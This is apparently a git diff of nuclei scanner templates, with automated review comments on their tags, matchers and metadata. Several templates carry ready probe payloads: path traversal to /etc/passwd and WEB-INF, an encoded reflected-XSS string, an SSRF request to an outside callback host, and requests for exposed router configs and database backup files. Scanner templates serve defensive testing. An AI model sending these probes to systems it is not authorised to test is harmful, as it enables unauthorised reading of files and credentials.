@@ -0,0 +1,16 @@ +id: square-oauth-secret + +info: + name: Square OAuth Secret + author: gaurang + severity: high + tags: token,file,square + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "sq0csp-[0-9A-Za-z\\-_]{43}" diff --git a/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml b/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml index 72a8c40af6..ab5c216ab1 100644 --- a/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml +++ b/nuclei-templates/Other/Symantec-Messaging-Gateway.yaml @@ -1,19 +1,23 @@ id: symantec-messaging-gateway + info: name: Symantec Messaging Gateway LFI - author: Random-Robbie + author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec + requests: - method: GET path: - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" + matchers-condition: and matchers: - type: word words: - "struts-default.xml" + - type: status status: - 200 diff --git a/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml b/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml deleted file mode 100755 index ed5a4d31ad..0000000000 --- a/nuclei-templates/Other/UnAuthenticated-Tensorboard.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: UnAuthenticated-Tensorboard -info: - name: Unauthenticated Tensorboard by Tensorflow - author: - - l0ne1y - description: |- - Tensorboard 未授权访问 - 在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问。在本漏洞中攻击者可在不需要授权信息情况下进入到应用程序内部(管理)。 - severity: high - remediation: |- - #### 官方修复方案: - 升级系统至无漏洞版本,或于官网下载安全补丁。 -requests: -- matchers: - - type: word - condition: and - words: - - scalars - - loading_mechanism - - custom_scalars - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/data/plugins_listing' - method: GET 
diff --git a/nuclei-templates/Other/WSO2-2019-0598.yaml b/nuclei-templates/Other/WSO2-2019-0598.yaml deleted file mode 100644 index 4008c5dc28..0000000000 --- a/nuclei-templates/Other/WSO2-2019-0598.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: WSO2-2019-0598 -info: - name: WSO2 <5.8.0 - Server Side Request Forgery - author: Amnotacat - severity: medium - description: | - WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 - remediation: | - Upgrade the product version to 5.8.0 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 - tags: ssrf,wso2,shindig -requests: - - method: GET - path: - - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" - matchers-condition: and - matchers: - - type: word - words: - - "Interactsh Server" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/26 diff --git a/nuclei-templates/Other/Wireless-leakage.yaml b/nuclei-templates/Other/Wireless-leakage.yaml new file mode 100644 index 0000000000..573e2150e1 --- /dev/null +++ b/nuclei-templates/Other/Wireless-leakage.yaml @@ -0,0 +1,20 @@ +id: Wireless-leakage +info: + name: Wireless-leakage + author: str1am + severity: high + reference: + - https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=26003&highlight=cms + tags: 74cms,sqli +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/DownloadCfg/RouterCfm.cfg" + matchers-condition: and + matchers: + - type: word + words: + - "passwd" + - type: status + status: + - 200 
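Review bot: `tags: 74cms,sqli` and the ichunqiu reference about a CMS do not match what the template does, which is a GET for `/cgi-bin/DownloadCfg/RouterCfm.cfg` followed by a check for the word `passwd`; the tags should describe the router configuration exposure (e.g. `tags: router,exposure,config`) and the reference should point at the actual advisory. `info.name: Wireless-leakage` restates the id rather than naming the affected product, and there is no `description:`. Matching only `passwd` in a 200 response is broad; a token specific to the configuration file format would cut false positives.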
diff --git a/nuclei-templates/Other/X-Host .yaml b/nuclei-templates/Other/X-Host.yaml similarity index 100% rename from nuclei-templates/Other/X-Host .yaml rename to nuclei-templates/Other/X-Host.yaml diff --git a/nuclei-templates/Other/X-Remote-Addr.yaml b/nuclei-templates/Other/X-Remote-Addr .yaml similarity index 100% rename from nuclei-templates/Other/X-Remote-Addr.yaml rename to nuclei-templates/Other/X-Remote-Addr .yaml diff --git a/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml b/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml deleted file mode 100644 index a2026cf72b..0000000000 --- a/nuclei-templates/Other/ZhongkeWangwei-fileRead.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ZhongkeWangwei-fileRead - -info: - name: Discuz论坛系统config_global.php.bak等备份文件信息泄露 - author: Str1am - severity: high - tags: Discuz,leakage - -requests: - - method: GET - path: - - "{{BaseURL}}/config/config_global.php.bak" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "<?php" - - "dbuser" - - "dbpw" - part: body - condition: and diff --git a/nuclei-templates/Other/abyss-web-server.yaml b/nuclei-templates/Other/abyss-web-server-12.yaml similarity index 100% rename from nuclei-templates/Other/abyss-web-server.yaml rename to nuclei-templates/Other/abyss-web-server-12.yaml diff --git a/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml b/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml new file mode 100644 index 0000000000..bb76301640 --- /dev/null +++ b/nuclei-templates/Other/accent-microcomputers-lfi-15.yaml 
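Review bot: The rename of `nuclei-templates/Other/X-Remote-Addr.yaml` to `X-Remote-Addr .yaml` inserts a space before the extension, while the neighbouring rename removes exactly that space from `X-Host .yaml`; this looks like the two renames were swapped, and a filename with a trailing space before `.yaml` is awkward to reference from shells, CI globs and Windows checkouts. The intended result is presumably `X-Remote-Addr.yaml` left unchanged and only `X-Host .yaml` renamed.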
@@ -0,0 +1,29 @@ +id: accent-microcomputers-lfi +info: + name: Accent Microcomputers LFI + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. + reference: + - https://cxsecurity.com/issue/WLB-2018050036 + - http://www.accent.com.pl + tags: microcomputers,accent,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: + cwe-id: CWE-22 +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml b/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml deleted file mode 100644 index 76805df1c1..0000000000 --- a/nuclei-templates/Other/accent-microcomputers-lfi-16.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: accent-microcomputers-lfi - -info: - name: Accent Microcomputers LFI - author: 0x_Akoko - severity: high - description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files. - reference: - - https://cxsecurity.com/issue/WLB-2018050036 - - http://www.accent.com.pl - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 - tags: microcomputers,accent,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/02 
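Review bot: The new `accent-microcomputers-lfi-15.yaml` is the deleted `-16` template with blank lines stripped and an empty `cve-id:` key added under `classification`; an empty `cve-id:` carries no information and should be removed (the deleted copy correctly omitted it). The `-15`/`-16` suffixes suggest numbered copies of one template rather than distinct checks, and the id `accent-microcomputers-lfi` is unchanged, so if both files ever coexist nuclei will report a duplicate template id.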
diff --git a/nuclei-templates/Other/accessibility-helper-xss-19.yaml b/nuclei-templates/Other/accessibility-helper-xss.yaml similarity index 100% rename from nuclei-templates/Other/accessibility-helper-xss-19.yaml rename to nuclei-templates/Other/accessibility-helper-xss.yaml diff --git a/nuclei-templates/Other/acemanager-login-23.yaml b/nuclei-templates/Other/acemanager-login-23.yaml new file mode 100644 index 0000000000..bb8ee9d3fc --- /dev/null +++ b/nuclei-templates/Other/acemanager-login-23.yaml @@ -0,0 +1,32 @@ +id: acemanager-login + +info: + name: ACEmanager detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' diff --git a/nuclei-templates/Other/acemanager-login.yaml b/nuclei-templates/Other/acemanager-login.yaml deleted file mode 100644 index 65b6f444c9..0000000000 --- a/nuclei-templates/Other/acemanager-login.yaml +++ /dev/null 
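Review bot: The replacement drops the `description:` and `classification:` block that the deleted `acemanager-login.yaml` carried, so the commit removes documentation with no stated reason; restore `description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems.` together with the classification. The word matcher has a single entry, so `condition: and` on it is redundant. `info.name: ACEmanager detect` also regresses from the deleted copy's `ACEmanager Detection`.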
@@ -1,40 +0,0 @@ -id: acemanager-login - -info: - name: ACEmanager Detection - author: pussycat0x - severity: info - description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. - metadata: - fofa-dork: 'app="ACEmanager"' - tags: panel,login,tech,acemanager - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' - -# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/acme-xss-28.yaml b/nuclei-templates/Other/acme-xss-28.yaml new file mode 100644 index 0000000000..06821bb4ae --- /dev/null +++ b/nuclei-templates/Other/acme-xss-28.yaml @@ -0,0 +1,19 @@ +id: acme-xss +info: + name: ACME / Let's Encrypt Reflected XSS + author: pdteam + severity: medium + tags: xss,acme +requests: + - method: GET + path: + - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' + matchers-condition: and + matchers: + - type: word + words: + - "alert(document.domain)" + - type: word + words: + - "/xml" + - "/html" diff --git a/nuclei-templates/Other/acme-xss.yaml b/nuclei-templates/Other/acme-xss.yaml deleted file mode 100644 index e6e5af1c0d..0000000000 --- a/nuclei-templates/Other/acme-xss.yaml +++ /dev/null 
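Review bot: The second word matcher (`/xml`, `/html`) has no `part: header`, so it is evaluated against the body, where the reflected payload itself contains `xmlns:x="http://www.w3.org/1999/xhtml"` and satisfies `/html` whenever the first matcher passes; add `part: header` so it really checks the Content-Type. The severity changes from `low` in the deleted copy to `medium` here with no `description:` or `reference:` recorded to justify the rating. The deleted `acme-xss.yaml` had the same matcher flaw, so this is not a regression, but the rewrite was the chance to fix it.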
@@ -1,22 +0,0 @@ -id: acme-xss - -info: - name: ACME / Let's Encrypt Reflected XSS - author: pdteam - severity: low - tags: xss,acme - -requests: - - method: GET - path: - - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "alert(document.domain)" - - type: word - words: - - "/xml" - - "/html" diff --git a/nuclei-templates/Other/acontent-detect-33.yaml b/nuclei-templates/Other/acontent-detect-32.yaml similarity index 100% rename from nuclei-templates/Other/acontent-detect-33.yaml rename to nuclei-templates/Other/acontent-detect-32.yaml diff --git a/nuclei-templates/Other/acquia-takeover-35.yaml b/nuclei-templates/Other/acquia-takeover-35.yaml new file mode 100644 index 0000000000..3740c22e91 --- /dev/null +++ b/nuclei-templates/Other/acquia-takeover-35.yaml @@ -0,0 +1,21 @@ +id: acquia-takeover + +info: + name: Acquia Takeover Detection + author: pdteam + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + name: acquia + words: + - If you are an Acquia Cloud customer and expect to see your site at this address + - The site you are looking for could not be found. + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/acquia-takeover.yaml b/nuclei-templates/Other/acquia-takeover.yaml deleted file mode 100644 index fa267bacc3..0000000000 --- a/nuclei-templates/Other/acquia-takeover.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdcommunity - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/active-admin-exposure.yaml b/nuclei-templates/Other/active-admin-exposure.yaml index f4bdf291e6..ea5abea227 100644 --- a/nuclei-templates/Other/active-admin-exposure.yaml +++ b/nuclei-templates/Other/active-admin-exposure.yaml @@ -4,7 +4,7 @@ info: name: ActiveAdmin Admin Dasboard Exposure author: pdteam severity: info - tags: panel,activeadmin + tags: panel requests: - method: GET @@ -15,4 +15,4 @@ requests: words: - "active_admin_content" - "active_admin-" - condition: and + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/activemq-panel-53.yaml b/nuclei-templates/Other/activemq-panel-53.yaml new file mode 100644 index 0000000000..8ffb96e13a --- /dev/null +++ b/nuclei-templates/Other/activemq-panel-53.yaml @@ -0,0 +1,28 @@ +id: activemq-panel + +info: + name: Apache ActiveMQ Exposure + author: pdteam + severity: info + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,activemq,apache + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - '
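Review bot: Removing `activeadmin` from `tags` leaves only `panel`, so this template can no longer be selected with `-tags activeadmin` alongside the other panel detections; tags are additive and the product tag should stay (`tags: panel,activeadmin`). The context line `name: ActiveAdmin Admin Dasboard Exposure` has a typo (`Dashboard`) that this edit could have fixed. The second hunk only drops the trailing newline.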

Welcome to the Apache ActiveMQ!

' + - 'Apache ActiveMQ' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/activemq-panel.yaml b/nuclei-templates/Other/activemq-panel.yaml deleted file mode 100644 index 7f435fed9a..0000000000 --- a/nuclei-templates/Other/activemq-panel.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: activemq-panel - -info: - name: Apache ActiveMQ Exposure - author: pdteam - severity: info - description: An Apache ActiveMQ implementation was discovered. - reference: - - https://activemq.apache.org/ - classification: - cwe-id: CWE-200 - tags: panel,activemq,apache - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - '
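Review bot: The first `words` entry is a quoted literal spanning several lines that reads as bare `Welcome to the Apache ActiveMQ!` surrounded by blank lines; in the rendered diff this looks like HTML markup was stripped from the literal, and a word matcher containing literal newlines only matches if the page emits exactly that whitespace. Check the committed file and, if the intent is the heading text, use a single-line literal such as `'Welcome to the Apache ActiveMQ!'`. The added `cvss-metrics`/`cvss-score: 0.0` pair is noise for an `info` detection; the deleted copy correctly carried only `cwe-id: CWE-200`.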

Welcome to the Apache ActiveMQ!

' - - 'Apache ActiveMQ' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/acunetix-panel-57.yaml b/nuclei-templates/Other/acunetix-panel-57.yaml new file mode 100644 index 0000000000..d9bb730073 --- /dev/null +++ b/nuclei-templates/Other/acunetix-panel-57.yaml @@ -0,0 +1,30 @@ +id: acunetix-panel-detect + +info: + name: Acunetix Login Panel + author: joanbono + severity: info + description: An Acunetix login panel was detected. + reference: + - https://www.acunetix.com/ + classification: + cwe-id: CWE-200 + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/#/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Acunetix' + - '' + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/acunetix-panel.yaml b/nuclei-templates/Other/acunetix-panel.yaml deleted file mode 100644 index bf7ce829d1..0000000000 --- a/nuclei-templates/Other/acunetix-panel.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: acunetix-panel-detect - -info: - name: Acunetix Panel detector - author: joanbono - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/#/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Acunetix' - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ad-widget-lfi-124.yaml b/nuclei-templates/Other/ad-widget-lfi.yaml similarity index 100% rename from nuclei-templates/Other/ad-widget-lfi-124.yaml rename to nuclei-templates/Other/ad-widget-lfi.yaml diff --git a/nuclei-templates/Other/adb-backup-enabled-62.yaml b/nuclei-templates/Other/adb-backup-enabled-62.yaml deleted file mode 100644 index 2f4a88df0a..0000000000 --- a/nuclei-templates/Other/adb-backup-enabled-62.yaml +++ /dev/null 
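Review bot: The body word matcher lists `'Acunetix'` and an empty string `''`; an empty word is a substring of every body, and with the default `or` condition the matcher passes on any response, leaving the status check as the only real test. If the empty entry is a tag-bearing literal that lost its markup in rendering, verify the committed file; otherwise drop it, or keep two real tokens with `condition: and`. The deleted `acunetix-panel.yaml` carried the same empty entry, so this rewrite was the chance to fix it.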
@@ -1,16 +0,0 @@
-id: adb-backup-enabled
-
-info:
- name: ADB Backup Enabled
- author: gaurang
- severity: low
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "android:allowBackup=\"true\""
\ No newline at end of file
diff --git a/nuclei-templates/Other/adb-backup-enabled-63.yaml b/nuclei-templates/Other/adb-backup-enabled-63.yaml
new file mode 100644
index 0000000000..5c756ded96
--- /dev/null
+++ b/nuclei-templates/Other/adb-backup-enabled-63.yaml
@@ -0,0 +1,23 @@
+id: adb-backup-enabled
+
+info:
+ name: ADB Backup Enabled
+ author: gaurang
+ severity: low
+ description: ADB Backup is enabled, which allows the backup and restore of an app's private data.
+ reference:
+ - https://adb-backup.com/
+ classification:
+ cwe-id: CWE-200
+ remediation: Ensure proper access or disable completely.
+ tags: android,file
+
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "android:allowBackup=\"true\""
+
+# Enhanced by mp on 2022/02/09
diff --git a/nuclei-templates/Other/addeventlistener-detect-64.yaml b/nuclei-templates/Other/addeventlistener-detect-64.yaml
index 0b4b57ca9d..8150161f44 100644
--- a/nuclei-templates/Other/addeventlistener-detect-64.yaml
+++ b/nuclei-templates/Other/addeventlistener-detect-64.yaml
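Review bot: The word matcher in adb-backup-enabled-63.yaml only fires on the literal `android:allowBackup="true"`, but the attribute defaults to `true` when it is absent from the manifest, so apps that never set it are exactly as exposed and are not flagged; a negative match on `android:allowBackup="false"` scoped to the manifest would catch both cases. The remediation line `Ensure proper access or disable completely.` is vague for a file template: something like `remediation: Set android:allowBackup="false" in AndroidManifest.xml unless backup of app data is explicitly required.` tells the reader what to change. The reference URL is inherited from nowhere in the deleted copy and I cannot verify it from here; an Android developer-documentation link would be the safer citation.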
@@ -1,19 +1,20 @@ id: addeventlistener-detect info: - name: AddEventlistener detection - author: yavolo + name: DOM EventListener detection + author: yavolo,dwisiswant0 severity: info - tags: xss - reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + reference: + - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source + tags: xss,misc requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: word - words: - - 'window.addEventListener(' - part: body \ No newline at end of file + - type: regex + part: body + regex: + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 diff --git a/nuclei-templates/Other/adiscon-loganalyzer-67.yaml b/nuclei-templates/Other/adiscon-loganalyzer-67.yaml deleted file mode 100644 index 8c3441c865..0000000000 --- a/nuclei-templates/Other/adiscon-loganalyzer-67.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: adiscon-loganalyzer -info: - name: Detect exposed Adiscon LogAnalyzer - author: geeknik - severity: high - description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. - reference: https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposures -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Adiscon LogAnalyzer' - - 'value="SYSLOG"' - - 'value="EVTRPT"' - - 'value="WEBLOG"' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - 'text/html' diff --git a/nuclei-templates/Other/adiscon-loganalyzer-70.yaml b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml new file mode 100644 index 0000000000..086763aa89 --- /dev/null +++ b/nuclei-templates/Other/adiscon-loganalyzer-70.yaml 
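Review bot: The new regex in addeventlistener-detect-64.yaml matches any `addEventListener(` call with any event name, so a template tagged `xss` now fires on ordinary `click`/`load` handlers on most pages; the cited reference is about web-message sources, which is the only listener type relevant to that sink. Restricting the event name, e.g. `- (([\w]+)\.)?add[Ee]vent[Ll]istener\(["']message["']`, keeps the intent and removes most of the noise. `\_` inside `[\w\_]` is redundant because `\w` already includes underscore, and the trailing `# Test cases:` URL would be more useful in `reference:` than as an inline comment on the regex line.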
@@ -0,0 +1,39 @@
+id: adiscon-loganalyzer
+
+info:
+ name: Adiscon LogAnalyzer Detection
+ author: geeknik
+ severity: high
+ description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services.
+ reference:
+ - https://loganalyzer.adiscon.com/
+ classification:
+ cwe-id: CWE-200
+ tags: adiscon,loganalyzer,syslog,exposures
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Adiscon LogAnalyzer'
+ - 'value="SYSLOG"'
+ - 'value="EVTRPT"'
+ - 'value="WEBLOG"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+# Enhanced by mp on 2022/03/20
diff --git a/nuclei-templates/Other/adminer-panel-75.yaml b/nuclei-templates/Other/adminer-panel-75.yaml
new file mode 100644
index 0000000000..adf4b4c859
--- /dev/null
+++ b/nuclei-templates/Other/adminer-panel-75.yaml
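Review bot: adiscon-loganalyzer-70.yaml keeps `severity: high` for what is purely a presence check (product name plus three option values on the index page), while every other panel/exposure template in this commit uses `severity: info` with `cwe-id: CWE-200`. A reachable log viewer is worth reporting, but nothing in the matchers establishes missing authentication or a vulnerability, so `severity: info` (or `low` with a description sentence explaining why an exposed syslog UI matters) is the consistent choice. The `text/html` header matcher is `part: header` with no header name, which is fine functionally but a comment such as `# any response header containing text/html` would make that explicit.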
@@ -0,0 +1,50 @@ +id: adminer-panel + +info: + name: Adminer Login Panel + author: random_robbie,meme-lord,ritikchaddha + severity: info + description: An Adminer login panel was detected. + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: title:"Login - Adminer" + tags: panel,adminer + +requests: + - method: GET + path: + - '{{BaseURL}}/adminer.php' + - '{{BaseURL}}/_adminer.php' + - '{{BaseURL}}/adminer/' + - '{{BaseURL}}/editor.php' + - '{{BaseURL}}/mysql.php' + - '{{BaseURL}}/sql.php' + - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + - '{{BaseURL}}/admin.php' + + headers: + Accept-Language: en-US,en;q=0.5 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminer-panel-fuzz-72.yaml b/nuclei-templates/Other/adminer-panel-fuzz-72.yaml new file mode 100644 index 0000000000..e80d5d2ff8 --- /dev/null +++ b/nuclei-templates/Other/adminer-panel-fuzz-72.yaml 
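Review bot: The version extractor in adminer-panel-75.yaml is shown as just `'([0-9.]+)'`; if that is genuinely the regex in the file (and not markup lost in rendering), group 1 returns the first run of digits and dots anywhere in the body rather than the Adminer version. Anchoring it to the title text, e.g. `- 'Login - Adminer ([0-9.]+)'`, makes the extracted value trustworthy. The new `{{BaseURL}}/admin.php` probe is safe because the `Login - Adminer` word matcher gates the result, but since it is a path many unrelated products use, a one-line comment noting that it is deliberately generic would help the next maintainer.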
@@ -0,0 +1,48 @@ +id: adminer-panel-fuzz + +info: + name: Adminer Login Panel Fuzz + author: random_robbie,meme-lord + severity: info + reference: + - https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer,login + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{BaseURL}} + + payloads: + path: helpers/wordlists/adminer-paths.txt + + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + condition: and + words: + - "- Adminer" + - "partial(verifyVersion" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminer-panel-fuzz-73.yaml b/nuclei-templates/Other/adminer-panel-fuzz-73.yaml deleted file mode 100644 index 9cfa2fa2db..0000000000 --- a/nuclei-templates/Other/adminer-panel-fuzz-73.yaml +++ /dev/null 
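Review bot: adminer-panel-fuzz-72.yaml depends on `helpers/wordlists/adminer-paths.txt`, which this commit does not add as far as I can see; if the helper is not present elsewhere in the repository the template fails to load. The version notes kept as bare comments under `info:` (`<= 4.2.4`, `<= 4.6.2`) are the most useful content here and would be better as a `description:` so they survive into output and are not silently dropped by tooling that strips comments. The template also repeats the `'([0-9.]+)'` extractor of adminer-panel-75.yaml and has the same anchoring concern.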
@@ -1,39 +0,0 @@ -id: adminer-panel-fuzz -info: - name: Adminer Login Panel Fuzz - author: random_robbie,meme-lord - severity: info - reference: - - https://blog.sorcery.ie/posts/adminer/ - tags: fuzz,adminer,login - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds -requests: - - raw: - - | - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Referer: {{BaseURL}} - payloads: - path: helpers/wordlists/adminer-paths.txt - threads: 50 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "- Adminer" - - "partial(verifyVersion" - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '([0-9.]+)' diff --git a/nuclei-templates/Other/adminer-panel.yaml b/nuclei-templates/Other/adminer-panel.yaml deleted file mode 100644 index b2cf28a10c..0000000000 --- a/nuclei-templates/Other/adminer-panel.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: adminer-panel - -info: - name: Adminer Login Panel - author: random_robbie,meme-lord - description: An Adminer login panel was detected. - severity: info - reference: - - https://blog.sorcery.ie/posts/adminer/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - metadata: - shodan-query: title:"Login - Adminer" - tags: panel,adminer - -requests: - - method: GET - path: - - '{{BaseURL}}/adminer.php' - - '{{BaseURL}}/_adminer.php' - - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/editor.php' - - '{{BaseURL}}/mysql.php' - - '{{BaseURL}}/sql.php' - - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' - - headers: - Accept-Language: en-US,en;q=0.5 - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Login - Adminer" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '([0-9.]+)' - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminset-panel-78.yaml b/nuclei-templates/Other/adminset-panel-78.yaml deleted file mode 100644 index b9f1644f02..0000000000 --- a/nuclei-templates/Other/adminset-panel-78.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: adminset-panel - -info: - name: Adminset Panel - author: ffffffff0x - severity: info - 